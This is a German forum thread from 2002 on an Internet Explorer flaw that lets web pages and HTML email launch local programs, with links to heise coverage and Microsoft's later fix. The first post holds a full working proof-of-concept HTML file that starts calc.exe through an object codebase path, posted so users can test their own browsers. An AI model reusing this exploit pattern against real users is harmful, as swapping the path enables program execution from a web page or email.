Lian 2.436 Geschrieben 5. März 2002 Melden Teilen Geschrieben 5. März 2002 Hallo allerseits, seit längerem ist ein exploit für den Internet Explorer ab der Version 5.5 bekannt. Seit kurzem kann dieser exploit auch ohne Active Scripting oder ActiveX ausgeführt werden: http://heise.de/newsticker/data/pab-04.03.02-001/ Ist nicht ganz ohne, probiert dringend mal den Browsercheck aus: http://www.heise.de/ct/browsercheck/e5demo10.shtml Um das ganze lokal zu testen kopiert einfach folgenden text in einen Datei test.html: <HTML> <head><title>none</title></head> <body> <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span> <xml id="oExec"> <security> <exploit> <![CDATA[ <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/calc.exe"></object> ]]> </exploit> </security> </xml> </body> </HTML> Einzig der Pfad in codebase zu c:/winnt/system32/calc.exe muss stimmen. Falls der Taschenrechner hochkommt, ist das ... nicht gut ;) Weil die Sicherheitslücke unabhängig von den Einstellungen die Interpretation von HTML-Seiten betrifft, sind auch Outlook und Outlook Express mit hohen Sicherheitseinstellungen von dem Problem betroffen. Eine einfache HTML-Mail kann somit beim Öffnen oder in der Vorschau ein Programm starten. Von Microsoft gibt es bislang noch keine Stellungnahme oder einen Patch. (pab/c't) Zitieren Link zu diesem Kommentar
ZAPnDUSTER 11 Geschrieben 26. April 2002 Melden Teilen Geschrieben 26. April 2002 Das ist ja mal heftig, habe die zeilen in ein html kopiert und in ie geöffnet - dann kommt der taschenrechner hoch :eek: :eek: Zitieren Link zu diesem Kommentar
Egoshooter 10 Geschrieben 31. Mai 2002 Melden Teilen Geschrieben 31. Mai 2002 Hallo zusammen. Hab es mal ausprobiert. Klappt wirklich, und dass mein Anti-Viren-Programm und der VirenGuard, nicht angeschlagen hat, trotz dem aktuellsten Update vom 29.05.02, finde ich schon bedenklich... Wie kann man sich davor schützen??? Gruss Micha Zitieren Link zu diesem Kommentar
Lian 2.436 Geschrieben 9. Juli 2002 Autor Melden Teilen Geschrieben 9. Juli 2002 Sorry, habe den Fix verschlafen, hier ist er: http://www.microsoft.com/windows/ie/downloads/critical/q321232/default.asp Zitieren Link zu diesem Kommentar
helpless 10 Geschrieben 10. Dezember 2002 Melden Teilen Geschrieben 10. Dezember 2002 Ich weiss leider nicht wie es sonst hier gehandhabt wird, deshalb einfach mal das was bei mir beim ausprobieren mit dem "Html-code" passiert ist. Ich hab nen WinXP Pro. rechner mit IE 6 und SP1 für den IE, was aber nicht hilft soweit ich weiss... ;-) Aber Norten AV 2003 mit neuester Virensignatur von vor 3 Tagen, hat sofort angeschlagen, als ich diese Datei nur Speicherrn wollte!!! Gruß helpless Zitieren Link zu diesem Kommentar
marka 584 Geschrieben 11. Dezember 2002 Melden Teilen Geschrieben 11. Dezember 2002 Hi @all: Erstmal Danke an Lian für den Hinweis! In der aktuellen c't steht ein ausführlicher Artikel über Sicherheitslöcher (Lücken sind das wohl nicht mehr, eher "Polen offen") und deren Bekämpfung sowie Browseralternativen. Zitieren Link zu diesem Kommentar
PeterB 10 Geschrieben 12. Dezember 2002 Melden Teilen Geschrieben 12. Dezember 2002 Original geschrieben von helpless Aber Norten AV 2003 mit neuester Virensignatur von vor 3 Tagen, hat sofort angeschlagen, als ich diese Datei nur Speicherrn wollte!!! Aha! Das ist seltsam! Weil bei mir nix passiert ist! Das neuste Update hatte ich auch drauf! Mhhh sollte mir zu denken geben. Zitieren Link zu diesem Kommentar
McAbflug 10 Geschrieben 15. Dezember 2002 Melden Teilen Geschrieben 15. Dezember 2002 stimmt, bei mir passierte auch nix, Virendefinitionen sind nagelneu und der Taschenrechner wird ohne Probleme gestartet?! Da sollte ich wohl doch wieder öfter mit Opera surfen? Zitieren Link zu diesem Kommentar
networker31 10 Geschrieben 15. Dezember 2002 Melden Teilen Geschrieben 15. Dezember 2002 O.K., mein Norton AV 2003 hat die datei auch beim speichern gekillt ! Beim Browser-Check passiert auch nix, Safty-first !! Zitieren Link zu diesem Kommentar
Empfohlene Beiträge
Schreibe einen Kommentar
Du kannst jetzt antworten und Dich später registrieren. Falls Du bereits ein Mitglied bist, logge Dich jetzt ein.